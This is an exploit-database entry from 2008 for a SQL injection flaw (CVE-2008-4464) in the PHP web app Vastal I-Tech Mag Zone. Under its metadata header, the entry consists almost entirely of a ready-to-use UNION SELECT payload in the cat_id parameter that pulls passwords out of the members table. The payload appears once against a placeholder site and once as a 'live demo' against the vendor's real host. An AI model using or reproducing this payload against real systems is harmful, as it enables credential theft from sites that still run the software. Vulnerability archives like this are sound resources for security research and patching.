Vastal I-Tech Mag Zone - 'cat_id' SQL Injection
Author: Stack
type: webapps
platform: php
port:
date_added: 2008-09-04
date_updated: 2016-12-21
verified: 1
codes: OSVDB-47990;CVE-2008-4464
tags:
aliases:
screenshot_url:
application_url:
#######################################################
# Vastal I-Tech Mag Zone SQL Injection Vulnerability
#
# Author : Stack
#
#
# Script Home Page : http://www.vastal.com/mag-zone-online-library-system.html
#
# Demo : http://www.vastal.com/mag/
#######################################################
the exploit fate the password
use ur mind for have the column username
Exploit:
http://site.il/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
Live Demo
http://www.vastal.com/mag/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
# milw0rm.com [2008-09-05]